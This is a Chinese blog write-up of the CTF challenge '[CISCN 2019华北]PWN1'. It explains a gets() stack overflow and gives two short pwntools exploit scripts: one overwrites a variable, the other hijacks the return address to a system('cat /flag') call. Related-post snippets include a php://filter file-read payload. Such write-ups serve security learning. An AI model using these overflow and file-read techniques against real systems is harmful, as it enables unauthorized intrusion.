nssctf [CISCN 2019华北]PWN1

最新推荐文章于 2024-05-13 16:17:54 发布
最新推荐文章于 2024-05-13 16:17:54 发布
阅读量655 收藏 1
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58624515/article/details/129410766
版权

checksec查看保护机制

发现开启了栈不可执行和部分地址随机化

使用ida静态分析

发现func函数,点进去查看函数具体代码

看到了逻辑,v2的值0.0

我们可以输入v1的值,当v2的值是11.28125的时候,查看文件内容

所以第一种思路就是

通过v1的值覆盖到v2的地址,将小数转成十六机制,发送使v2的值就等于11.2815

v1离rbp的距离是0x30

v2离rbp的距离是0x4

所以v1离v2的距离是0x30-0x4,并且11.2815的十六进制是0x41348000

第一个exp是

from pwn import *
#io = remote("1.14.71.254",28963)
io = process("./one")
payload = cyclic(0x30-0x4) + p64(0x41348000)
io.sendline(payload)
io.interactive()

还有个思路就是我们覆盖返回地址为system("cat /flag")的地址

地址是

0x0000000004006BE

所以第二个exp是

from pwn import *
#io = remote("1.14.71.254",28963)
io = process("./one")
payload = cyclic(0x30+0x8) + p64(0x4006BE)
io.sendline(payload)
io.interactive()

Ni_ght
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ciscn-2019-pwn
11-29
1. baby_pwn2. bms3. daily4. Double5 your_pwn
your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之your_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
[CISCN 2019华北]PWN1
s_hiy_iyi的博客
11-03 112
v2的值给的是浮点数,需要转换成16进制的,十六进制值可以从汇编中找到。v1在栈中的地址是0x30到0x04,所以要覆盖的长度就是。
[CISCN 2019华北]PWN1 CTF—PWN
最新发布
m0_72904009的博客
05-13 353
[CISCN 2019华北]PWN1 CTF—PWN
【PWN · ret2text】[CISCN 2019华北]PWN1
Mr_Fmnwon的博客
04-21 509
依旧是简单的ret2text。
pwn——ciscn_2019_n_1#pwn1_sctf_2016#jarvisoj_level0
LSYZWF的博客
10-26 551
文章目录ciscn_2019_n_1题目解答 ciscn_2019_n_1 题目 题目链接:https://buuoj.cn/challenges#ciscn_2019_n_1 解答 1、打开IDA进行分析 发现函数gets和系统命令cat 此函数的大致意思是输入v1的值,然后判断v2,故存在栈溢出使得v2的内存中的值为11.28125 2、判断偏移地址 v2的内存地址距离v1首地址的偏移量是30h-04h=2ch 3、gdb调试一波 没有堆栈溢出保护 4、编写脚本 11.28125的十六进制可以在I
Double ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
pwn赛题之Double ciscn 2019 第十二届全国大学生信息安全竞赛
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛
04-22
baby_pwn 赛题 ciscn 2019 第十二届全国大学生信息安全竞赛
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 579
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
[BUUCTF-pwn]——ciscn_2019_n_1
Y_peak的博客
01-31 914
[BUUCTF-pwn]——ciscn_2019_n_1 [BUUCTF-pwn]——ciscn_2019_n_1思路一 —— 覆盖局部变量思路二 —— 覆盖返回地址 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_1 题目: 老规矩下载下来后,在Linux上checksec一下,64位,并且没有开启栈保护,意味着我们可以利用栈溢出 在IDA中看一下,main函数里面没有什么可以利用的 双击func函数看看,就是我们想要的。 思路一 —— 覆盖局部变量
nsctf_online_2019_pwn1(劫持IO_2_1_stdout来泄露地址)
seaaseesa的博客
04-30 1303
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
[每日一PWN]BUUCTF ciscn_2019_n_1
qq_55233040的博客
11-21 408
这道题双解,一种ret2text,另一种就是单纯的覆盖数据改变判断结果。
NSSCTF Pwn Page 1 - 2
红叶的博客
03-14 1586
NSSCTF Pwn 第一页到第二页全部题目解析。 刷了大概一个月的NSSCTF,对Pwn的理解更高了,虽然也没高到哪去。
[CISCN2019 华北赛区 Day1 Web5]CyberPunk
K1ose的博客
03-24 139
访问页面,view-source一下,发现最下边有提示传参?file=; 伪协议读一下源代码; ?file=php://filter/convert.base64-encode/resource=index.php 得到的base64值解码; 这里只提取php代码; <?php ini_set('open_basedir', '/var/www/html/'); // $file = $_GET["file"]; $file = (isset($_GET['file']) ? $_GET['fil
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1591
这不是欺负老实人嘛~
NSSCTF PWN方向刷题记录
CyhStyrl的博客
04-03 619
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
讲解一下pwn 2019第五空间
04-02
Pwn 2019第五空间是一场CTF比赛中的一道题目。该题目为二进制漏洞利用类题目,需要利用二进制程序中的漏洞进行攻击,获取程序的控制权。 该题目中提供了一个二进制文件,玩家需要对该文件进行分析,找出其中的漏洞并进行利用。分析过程中需要使用调试工具、反汇编工具等,以便深入理解程序的执行过程。 在这个题目中,玩家需要利用程序中的缓冲区溢出漏洞,通过向缓冲区中输入恶意代码,实现对程序的控制。具体来说,玩家需要构造一个恶意输入,使得程序在执行过程中跳转到指定的地址,并执行指定的代码,从而获取程序的控制权。 该题目难度较高,需要玩家具备较强的二进制漏洞利用能力和调试能力。同时,该题目也为玩家提供了一个锻炼自己技能的机会,帮助玩家提高对二进制漏洞利用的理解和掌握。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值